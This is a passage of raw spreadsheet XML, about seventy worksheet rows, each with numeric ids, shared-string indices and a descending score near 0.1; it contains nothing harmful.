      <c r="F25197" s="2">
        <v>0.09912854030501086</v>
      </c>
    </row>
    <row r="25198" ht="15.75" customHeight="1">
      <c r="A25198" s="1">
        <v>18256.0</v>
      </c>
      <c r="B25198" s="2">
        <v>5.217235E7</v>
      </c>
      <c r="C25198" s="2" t="s">
        <v>24243</v>
      </c>
      <c r="D25198" s="2">
        <v>1.0</v>
      </c>
      <c r="E25198" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25198" s="2">
        <v>0.09912854030501086</v>
      </c>
    </row>
    <row r="25199" ht="15.75" customHeight="1">
      <c r="A25199" s="1">
        <v>27442.0</v>
      </c>
      <c r="B25199" s="2">
        <v>2.1981057E7</v>
      </c>
      <c r="C25199" s="2" t="s">
        <v>24244</v>
      </c>
      <c r="D25199" s="2">
        <v>1.0</v>
      </c>
      <c r="E25199" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25199" s="2">
        <v>0.09912854030501086</v>
      </c>
    </row>
    <row r="25200" ht="15.75" customHeight="1">
      <c r="A25200" s="1">
        <v>33662.0</v>
      </c>
      <c r="B25200" s="2">
        <v>8405346.0</v>
      </c>
      <c r="C25200" s="2" t="s">
        <v>24245</v>
      </c>
      <c r="D25200" s="2">
        <v>1.0</v>
      </c>
      <c r="E25200" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25200" s="2">
        <v>0.09912854030501086</v>
      </c>
    </row>
    <row r="25201" ht="15.75" customHeight="1">
      <c r="A25201" s="1">
        <v>27169.0</v>
      </c>
      <c r="B25201" s="2">
        <v>2.0852023E7</v>
      </c>
      <c r="C25201" s="2" t="s">
        <v>24246</v>
      </c>
      <c r="D25201" s="2">
        <v>1.0</v>
      </c>
      <c r="E25201" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25201" s="2">
        <v>0.09907407407407405</v>
      </c>
    </row>
    <row r="25202" ht="15.75" customHeight="1">
      <c r="A25202" s="1">
        <v>33003.0</v>
      </c>
      <c r="B25202" s="2">
        <v>6626265.0</v>
      </c>
      <c r="C25202" s="2" t="s">
        <v>24247</v>
      </c>
      <c r="D25202" s="2">
        <v>1.0</v>
      </c>
      <c r="E25202" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25202" s="2">
        <v>0.09865900383141762</v>
      </c>
    </row>
    <row r="25203" ht="15.75" customHeight="1">
      <c r="A25203" s="1">
        <v>28258.0</v>
      </c>
      <c r="B25203" s="2">
        <v>2.5365469E7</v>
      </c>
      <c r="C25203" s="2" t="s">
        <v>18373</v>
      </c>
      <c r="D25203" s="2">
        <v>1.0</v>
      </c>
      <c r="E25203" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25203" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="25204" ht="15.75" customHeight="1">
      <c r="A25204" s="1">
        <v>23549.0</v>
      </c>
      <c r="B25204" s="2">
        <v>6053904.0</v>
      </c>
      <c r="C25204" s="2" t="s">
        <v>24248</v>
      </c>
      <c r="D25204" s="2">
        <v>1.0</v>
      </c>
      <c r="E25204" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25204" s="2">
        <v>0.09844054580896686</v>
      </c>
    </row>
    <row r="25205" ht="15.75" customHeight="1">
      <c r="A25205" s="1">
        <v>19489.0</v>
      </c>
      <c r="B25205" s="2">
        <v>5.5858545E7</v>
      </c>
      <c r="C25205" s="2" t="s">
        <v>24249</v>
      </c>
      <c r="D25205" s="2">
        <v>1.0</v>
      </c>
      <c r="E25205" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25205" s="2">
        <v>0.0977366255144033</v>
      </c>
    </row>
    <row r="25206" ht="15.75" customHeight="1">
      <c r="A25206" s="1">
        <v>10405.0</v>
      </c>
      <c r="B25206" s="2">
        <v>9653692.0</v>
      </c>
      <c r="C25206" s="2" t="s">
        <v>24250</v>
      </c>
      <c r="D25206" s="2">
        <v>1.0</v>
      </c>
      <c r="E25206" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25206" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="25207" ht="15.75" customHeight="1">
      <c r="A25207" s="1">
        <v>26499.0</v>
      </c>
      <c r="B25207" s="2">
        <v>1.7540851E7</v>
      </c>
      <c r="C25207" s="2" t="s">
        <v>24251</v>
      </c>
      <c r="D25207" s="2">
        <v>1.0</v>
      </c>
      <c r="E25207" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25207" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="25208" ht="15.75" customHeight="1">
      <c r="A25208" s="1">
        <v>19450.0</v>
      </c>
      <c r="B25208" s="2">
        <v>5.5729674E7</v>
      </c>
      <c r="C25208" s="2" t="s">
        <v>24252</v>
      </c>
      <c r="D25208" s="2">
        <v>1.0</v>
      </c>
      <c r="E25208" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25208" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="25209" ht="15.75" customHeight="1">
      <c r="A25209" s="1">
        <v>13084.0</v>
      </c>
      <c r="B25209" s="2">
        <v>3.3365097E7</v>
      </c>
      <c r="C25209" s="2" t="s">
        <v>24253</v>
      </c>
      <c r="D25209" s="2">
        <v>1.0</v>
      </c>
      <c r="E25209" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25209" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="25210" ht="15.75" customHeight="1">
      <c r="A25210" s="1">
        <v>30239.0</v>
      </c>
      <c r="B25210" s="2">
        <v>3.7478723E7</v>
      </c>
      <c r="C25210" s="2" t="s">
        <v>24254</v>
      </c>
      <c r="D25210" s="2">
        <v>1.0</v>
      </c>
      <c r="E25210" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25210" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="25211" ht="15.75" customHeight="1">
      <c r="A25211" s="1">
        <v>965.0</v>
      </c>
      <c r="B25211" s="2">
        <v>2.2721344E7</v>
      </c>
      <c r="C25211" s="2" t="s">
        <v>24255</v>
      </c>
      <c r="D25211" s="2">
        <v>1.0</v>
      </c>
      <c r="E25211" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25211" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25212" ht="15.75" customHeight="1">
      <c r="A25212" s="1">
        <v>6369.0</v>
      </c>
      <c r="B25212" s="2">
        <v>4.8376597E7</v>
      </c>
      <c r="C25212" s="2" t="s">
        <v>24256</v>
      </c>
      <c r="D25212" s="2">
        <v>1.0</v>
      </c>
      <c r="E25212" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25212" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25213" ht="15.75" customHeight="1">
      <c r="A25213" s="1">
        <v>7201.0</v>
      </c>
      <c r="B25213" s="2">
        <v>5.0594248E7</v>
      </c>
      <c r="C25213" s="2" t="s">
        <v>24257</v>
      </c>
      <c r="D25213" s="2">
        <v>1.0</v>
      </c>
      <c r="E25213" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25213" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25214" ht="15.75" customHeight="1">
      <c r="A25214" s="1">
        <v>8221.0</v>
      </c>
      <c r="B25214" s="2">
        <v>5.3334292E7</v>
      </c>
      <c r="C25214" s="2" t="s">
        <v>24258</v>
      </c>
      <c r="D25214" s="2">
        <v>1.0</v>
      </c>
      <c r="E25214" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25214" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25215" ht="15.75" customHeight="1">
      <c r="A25215" s="1">
        <v>14306.0</v>
      </c>
      <c r="B25215" s="2">
        <v>3.8625921E7</v>
      </c>
      <c r="C25215" s="2" t="s">
        <v>24259</v>
      </c>
      <c r="D25215" s="2">
        <v>1.0</v>
      </c>
      <c r="E25215" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25215" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25216" ht="15.75" customHeight="1">
      <c r="A25216" s="1">
        <v>17412.0</v>
      </c>
      <c r="B25216" s="2">
        <v>4.9659546E7</v>
      </c>
      <c r="C25216" s="2" t="s">
        <v>24260</v>
      </c>
      <c r="D25216" s="2">
        <v>1.0</v>
      </c>
      <c r="E25216" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25216" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25217" ht="15.75" customHeight="1">
      <c r="A25217" s="1">
        <v>18336.0</v>
      </c>
      <c r="B25217" s="2">
        <v>5.2420293E7</v>
      </c>
      <c r="C25217" s="2" t="s">
        <v>24261</v>
      </c>
      <c r="D25217" s="2">
        <v>1.0</v>
      </c>
      <c r="E25217" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25217" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25218" ht="15.75" customHeight="1">
      <c r="A25218" s="1">
        <v>28534.0</v>
      </c>
      <c r="B25218" s="2">
        <v>2.6796949E7</v>
      </c>
      <c r="C25218" s="2" t="s">
        <v>24262</v>
      </c>
      <c r="D25218" s="2">
        <v>1.0</v>
      </c>
      <c r="E25218" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25218" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="25219" ht="15.75" customHeight="1">
      <c r="A25219" s="1">
        <v>11110.0</v>
      </c>
      <c r="B25219" s="2">
        <v>1.8765349E7</v>
      </c>
      <c r="C25219" s="2" t="s">
        <v>24263</v>
      </c>
      <c r="D25219" s="2">
        <v>1.0</v>
      </c>
      <c r="E25219" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25219" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25220" ht="15.75" customHeight="1">
      <c r="A25220" s="1">
        <v>13812.0</v>
      </c>
      <c r="B25220" s="2">
        <v>3.6673376E7</v>
      </c>
      <c r="C25220" s="2" t="s">
        <v>24264</v>
      </c>
      <c r="D25220" s="2">
        <v>1.0</v>
      </c>
      <c r="E25220" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25220" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25221" ht="15.75" customHeight="1">
      <c r="A25221" s="1">
        <v>19149.0</v>
      </c>
      <c r="B25221" s="2">
        <v>5.4839127E7</v>
      </c>
      <c r="C25221" s="2" t="s">
        <v>24265</v>
      </c>
      <c r="D25221" s="2">
        <v>1.0</v>
      </c>
      <c r="E25221" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25221" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25222" ht="15.75" customHeight="1">
      <c r="A25222" s="1">
        <v>26657.0</v>
      </c>
      <c r="B25222" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C25222" s="2" t="s">
        <v>24266</v>
      </c>
      <c r="D25222" s="2">
        <v>1.0</v>
      </c>
      <c r="E25222" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25222" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25223" ht="15.75" customHeight="1">
      <c r="A25223" s="1">
        <v>32114.0</v>
      </c>
      <c r="B25223" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C25223" s="2" t="s">
        <v>24267</v>
      </c>
      <c r="D25223" s="2">
        <v>1.0</v>
      </c>
      <c r="E25223" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25223" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25224" ht="15.75" customHeight="1">
      <c r="A25224" s="1">
        <v>32202.0</v>
      </c>
      <c r="B25224" s="2">
        <v>5.4792241E7</v>
      </c>
      <c r="C25224" s="2" t="s">
        <v>24268</v>
      </c>
      <c r="D25224" s="2">
        <v>1.0</v>
      </c>
      <c r="E25224" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25224" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25225" ht="15.75" customHeight="1">
      <c r="A25225" s="1">
        <v>32838.0</v>
      </c>
      <c r="B25225" s="2">
        <v>6242244.0</v>
      </c>
      <c r="C25225" s="2" t="s">
        <v>24269</v>
      </c>
      <c r="D25225" s="2">
        <v>1.0</v>
      </c>
      <c r="E25225" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25225" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25226" ht="15.75" customHeight="1">
      <c r="A25226" s="1">
        <v>33548.0</v>
      </c>
      <c r="B25226" s="2">
        <v>8181438.0</v>
      </c>
      <c r="C25226" s="2" t="s">
        <v>24270</v>
      </c>
      <c r="D25226" s="2">
        <v>1.0</v>
      </c>
      <c r="E25226" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25226" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25227" ht="15.75" customHeight="1">
      <c r="A25227" s="1">
        <v>33580.0</v>
      </c>
      <c r="B25227" s="2">
        <v>8301729.0</v>
      </c>
      <c r="C25227" s="2" t="s">
        <v>24271</v>
      </c>
      <c r="D25227" s="2">
        <v>1.0</v>
      </c>
      <c r="E25227" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25227" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="25228" ht="15.75" customHeight="1">
      <c r="A25228" s="1">
        <v>9898.0</v>
      </c>
      <c r="B25228" s="2">
        <v>5.6770536E7</v>
      </c>
      <c r="C25228" s="2" t="s">
        <v>24272</v>
      </c>
      <c r="D25228" s="2">
        <v>1.0</v>
      </c>
      <c r="E25228" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25228" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="25229" ht="15.75" customHeight="1">
      <c r="A25229" s="1">
        <v>10503.0</v>
      </c>
      <c r="B25229" s="2">
        <v>1.1423041E7</v>
      </c>
      <c r="C25229" s="2" t="s">
        <v>24273</v>
      </c>
      <c r="D25229" s="2">
        <v>1.0</v>
      </c>
      <c r="E25229" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25229" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="25230" ht="15.75" customHeight="1">
      <c r="A25230" s="1">
        <v>4493.0</v>
      </c>
      <c r="B25230" s="2">
        <v>4.2534694E7</v>
      </c>
      <c r="C25230" s="2" t="s">
        <v>24274</v>
      </c>
      <c r="D25230" s="2">
        <v>1.0</v>
      </c>
      <c r="E25230" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25230" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="25231" ht="15.75" customHeight="1">
      <c r="A25231" s="1">
        <v>18175.0</v>
      </c>
      <c r="B25231" s="2">
        <v>5.1967924E7</v>
      </c>
      <c r="C25231" s="2" t="s">
        <v>24275</v>
      </c>
      <c r="D25231" s="2">
        <v>1.0</v>
      </c>
      <c r="E25231" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25231" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="25232" ht="15.75" customHeight="1">
      <c r="A25232" s="1">
        <v>4385.0</v>
      </c>
      <c r="B25232" s="2">
        <v>4.2193636E7</v>
      </c>
      <c r="C25232" s="2" t="s">
        <v>24276</v>
      </c>
      <c r="D25232" s="2">
        <v>1.0</v>
      </c>
      <c r="E25232" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25232" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="25233" ht="15.75" customHeight="1">
      <c r="A25233" s="1">
        <v>10198.0</v>
      </c>
      <c r="B25233" s="2">
        <v>5.7402525E7</v>
      </c>
      <c r="C25233" s="2" t="s">
        <v>24277</v>
      </c>
      <c r="D25233" s="2">
        <v>1.0</v>
      </c>
      <c r="E25233" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25233" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="25234" ht="15.75" customHeight="1">
      <c r="A25234" s="1">
        <v>15068.0</v>
      </c>
      <c r="B25234" s="2">
        <v>4.1719746E7</v>
      </c>
      <c r="C25234" s="2" t="s">
        <v>24278</v>
      </c>
      <c r="D25234" s="2">
        <v>1.0</v>
      </c>
      <c r="E25234" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25234" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="25235" ht="15.75" customHeight="1">
      <c r="A25235" s="1">
        <v>22152.0</v>
      </c>
      <c r="B25235" s="2">
        <v>3.1284604E7</v>
      </c>
      <c r="C25235" s="2" t="s">
        <v>24146</v>
      </c>
      <c r="D25235" s="2">
        <v>1.0</v>
      </c>
      <c r="E25235" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25235" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="25236" ht="15.75" customHeight="1">
      <c r="A25236" s="1">
        <v>22535.0</v>
      </c>
      <c r="B25236" s="2">
        <v>3.7937864E7</v>
      </c>
      <c r="C25236" s="2" t="s">
        <v>24279</v>
      </c>
      <c r="D25236" s="2">
        <v>1.0</v>
      </c>
      <c r="E25236" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25236" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="25237" ht="15.75" customHeight="1">
      <c r="A25237" s="1">
        <v>31266.0</v>
      </c>
      <c r="B25237" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C25237" s="2" t="s">
        <v>24280</v>
      </c>
      <c r="D25237" s="2">
        <v>1.0</v>
      </c>
      <c r="E25237" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25237" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="25238" ht="15.75" customHeight="1">
      <c r="A25238" s="1">
        <v>17357.0</v>
      </c>
      <c r="B25238" s="2">
        <v>4.9445046E7</v>
      </c>
      <c r="C25238" s="2" t="s">
        <v>24281</v>
      </c>
      <c r="D25238" s="2">
        <v>1.0</v>
      </c>
      <c r="E25238" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25238" s="2">
        <v>0.09674329501915709</v>
      </c>
    </row>
    <row r="25239" ht="15.75" customHeight="1">
      <c r="A25239" s="1">
        <v>32757.0</v>
      </c>
      <c r="B25239" s="2">
        <v>6053903.0</v>
      </c>
      <c r="C25239" s="2" t="s">
        <v>24248</v>
      </c>
      <c r="D25239" s="2">
        <v>1.0</v>
      </c>
      <c r="E25239" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25239" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="25240" ht="15.75" customHeight="1">
      <c r="A25240" s="1">
        <v>33429.0</v>
      </c>
      <c r="B25240" s="2">
        <v>7775522.0</v>
      </c>
      <c r="C25240" s="2" t="s">
        <v>24282</v>
      </c>
      <c r="D25240" s="2">
        <v>1.0</v>
      </c>
      <c r="E25240" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25240" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="25241" ht="15.75" customHeight="1">
      <c r="A25241" s="1">
        <v>9156.0</v>
      </c>
      <c r="B25241" s="2">
        <v>5.5282533E7</v>
      </c>
      <c r="C25241" s="2" t="s">
        <v>24283</v>
      </c>
      <c r="D25241" s="2">
        <v>1.0</v>
      </c>
      <c r="E25241" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25241" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="25242" ht="15.75" customHeight="1">
      <c r="A25242" s="1">
        <v>2650.0</v>
      </c>
      <c r="B25242" s="2">
        <v>3.4672251E7</v>
      </c>
      <c r="C25242" s="2" t="s">
        <v>24284</v>
      </c>
      <c r="D25242" s="2">
        <v>1.0</v>
      </c>
      <c r="E25242" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25242" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="25243" ht="15.75" customHeight="1">
      <c r="A25243" s="1">
        <v>11779.0</v>
      </c>
      <c r="B25243" s="2">
        <v>2.4291938E7</v>
      </c>
      <c r="C25243" s="2" t="s">
        <v>24285</v>
      </c>
      <c r="D25243" s="2">
        <v>1.0</v>
      </c>
      <c r="E25243" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25243" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="25244" ht="15.75" customHeight="1">
      <c r="A25244" s="1">
        <v>1252.0</v>
      </c>
      <c r="B25244" s="2">
        <v>2.5189344E7</v>
      </c>
      <c r="C25244" s="2" t="s">
        <v>24286</v>
      </c>
      <c r="D25244" s="2">
        <v>1.0</v>
      </c>
      <c r="E25244" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25244" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="25245" ht="15.75" customHeight="1">
      <c r="A25245" s="1">
        <v>13446.0</v>
      </c>
      <c r="B25245" s="2">
        <v>3.5171284E7</v>
      </c>
      <c r="C25245" s="2" t="s">
        <v>24287</v>
      </c>
      <c r="D25245" s="2">
        <v>1.0</v>
      </c>
      <c r="E25245" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25245" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="25246" ht="15.75" customHeight="1">
      <c r="A25246" s="1">
        <v>19118.0</v>
      </c>
      <c r="B25246" s="2">
        <v>5.4753765E7</v>
      </c>
      <c r="C25246" s="2" t="s">
        <v>24288</v>
      </c>
      <c r="D25246" s="2">
        <v>1.0</v>
      </c>
      <c r="E25246" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25246" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="25247" ht="15.75" customHeight="1">
      <c r="A25247" s="1">
        <v>8001.0</v>
      </c>
      <c r="B25247" s="2">
        <v>5.2777186E7</v>
      </c>
      <c r="C25247" s="2" t="s">
        <v>24289</v>
      </c>
      <c r="D25247" s="2">
        <v>1.0</v>
      </c>
      <c r="E25247" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25247" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="25248" ht="15.75" customHeight="1">
      <c r="A25248" s="1">
        <v>27864.0</v>
      </c>
      <c r="B25248" s="2">
        <v>2.351068E7</v>
      </c>
      <c r="C25248" s="2" t="s">
        <v>24290</v>
      </c>
      <c r="D25248" s="2">
        <v>1.0</v>
      </c>
      <c r="E25248" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25248" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="25249" ht="15.75" customHeight="1">
      <c r="A25249" s="1">
        <v>2203.0</v>
      </c>
      <c r="B25249" s="2">
        <v>3.2049379E7</v>
      </c>
      <c r="C25249" s="2" t="s">
        <v>24291</v>
      </c>
      <c r="D25249" s="2">
        <v>1.0</v>
      </c>
      <c r="E25249" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25249" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25250" ht="15.75" customHeight="1">
      <c r="A25250" s="1">
        <v>7613.0</v>
      </c>
      <c r="B25250" s="2">
        <v>5.170005E7</v>
      </c>
      <c r="C25250" s="2" t="s">
        <v>24292</v>
      </c>
      <c r="D25250" s="2">
        <v>1.0</v>
      </c>
      <c r="E25250" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25250" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25251" ht="15.75" customHeight="1">
      <c r="A25251" s="1">
        <v>7662.0</v>
      </c>
      <c r="B25251" s="2">
        <v>5.1818333E7</v>
      </c>
      <c r="C25251" s="2" t="s">
        <v>24293</v>
      </c>
      <c r="D25251" s="2">
        <v>1.0</v>
      </c>
      <c r="E25251" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25251" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25252" ht="15.75" customHeight="1">
      <c r="A25252" s="1">
        <v>15027.0</v>
      </c>
      <c r="B25252" s="2">
        <v>4.1553656E7</v>
      </c>
      <c r="C25252" s="2" t="s">
        <v>24294</v>
      </c>
      <c r="D25252" s="2">
        <v>1.0</v>
      </c>
      <c r="E25252" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25252" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25253" ht="15.75" customHeight="1">
      <c r="A25253" s="1">
        <v>16700.0</v>
      </c>
      <c r="B25253" s="2">
        <v>4.7396871E7</v>
      </c>
      <c r="C25253" s="2" t="s">
        <v>24295</v>
      </c>
      <c r="D25253" s="2">
        <v>1.0</v>
      </c>
      <c r="E25253" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25253" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25254" ht="15.75" customHeight="1">
      <c r="A25254" s="1">
        <v>20797.0</v>
      </c>
      <c r="B25254" s="2">
        <v>1.5254744E7</v>
      </c>
      <c r="C25254" s="2" t="s">
        <v>24296</v>
      </c>
      <c r="D25254" s="2">
        <v>1.0</v>
      </c>
      <c r="E25254" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25254" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25255" ht="15.75" customHeight="1">
      <c r="A25255" s="1">
        <v>22787.0</v>
      </c>
      <c r="B25255" s="2">
        <v>4.5374381E7</v>
      </c>
      <c r="C25255" s="2" t="s">
        <v>24297</v>
      </c>
      <c r="D25255" s="2">
        <v>1.0</v>
      </c>
      <c r="E25255" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25255" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25256" ht="15.75" customHeight="1">
      <c r="A25256" s="1">
        <v>22808.0</v>
      </c>
      <c r="B25256" s="2">
        <v>4.5912966E7</v>
      </c>
      <c r="C25256" s="2" t="s">
        <v>24298</v>
      </c>
      <c r="D25256" s="2">
        <v>1.0</v>
      </c>
      <c r="E25256" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25256" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25257" ht="15.75" customHeight="1">
      <c r="A25257" s="1">
        <v>30822.0</v>
      </c>
      <c r="B25257" s="2">
        <v>4.537438E7</v>
      </c>
      <c r="C25257" s="2" t="s">
        <v>24299</v>
      </c>
      <c r="D25257" s="2">
        <v>1.0</v>
      </c>
      <c r="E25257" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25257" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="25258" ht="15.75" customHeight="1">
      <c r="A25258" s="1">
        <v>34100.0</v>
      </c>
      <c r="B25258" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C25258" s="2" t="s">
        <v>24300</v>
      </c>
      <c r="D25258" s="2">
        <v>1.0</v>
      </c>
      <c r="E25258" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25258" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="25259" ht="15.75" customHeight="1">
      <c r="A25259" s="1">
        <v>11728.0</v>
      </c>
      <c r="B25259" s="2">
        <v>2.3941648E7</v>
      </c>
      <c r="C25259" s="2" t="s">
        <v>24301</v>
      </c>
      <c r="D25259" s="2">
        <v>1.0</v>
      </c>
      <c r="E25259" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25259" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="25260" ht="15.75" customHeight="1">
      <c r="A25260" s="1">
        <v>34188.0</v>
      </c>
      <c r="B25260" s="2">
        <v>9958437.0</v>
      </c>
      <c r="C25260" s="2" t="s">
        <v>24302</v>
      </c>
      <c r="D25260" s="2">
        <v>1.0</v>
      </c>
      <c r="E25260" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25260" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="25261" ht="15.75" customHeight="1">
      <c r="A25261" s="1">
        <v>695.0</v>
      </c>
      <c r="B25261" s="2">
        <v>2.0438688E7</v>
      </c>
      <c r="C25261" s="2" t="s">
        <v>24303</v>
      </c>
      <c r="D25261" s="2">
        <v>1.0</v>
      </c>
      <c r="E25261" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25261" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="25262" ht="15.75" customHeight="1">
      <c r="A25262" s="1">
        <v>9562.0</v>
      </c>
      <c r="B25262" s="2">
        <v>5.6048578E7</v>
      </c>
      <c r="C25262" s="2" t="s">
        <v>24304</v>
      </c>
      <c r="D25262" s="2">
        <v>1.0</v>
      </c>
      <c r="E25262" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25262" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="25263" ht="15.75" customHeight="1">
      <c r="A25263" s="1">
        <v>17617.0</v>
      </c>
      <c r="B25263" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C25263" s="2" t="s">
        <v>24305</v>
      </c>
      <c r="D25263" s="2">
        <v>1.0</v>
      </c>
      <c r="E25263" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25263" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="25264" ht="15.75" customHeight="1">
      <c r="A25264" s="1">
        <v>144.0</v>
      </c>
      <c r="B25264" s="2">
        <v>1.3584987E7</v>
      </c>
      <c r="C25264" s="2" t="s">
        <v>24306</v>
      </c>
      <c r="D25264" s="2">
        <v>1.0</v>
      </c>
      <c r="E25264" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25264" s="2">
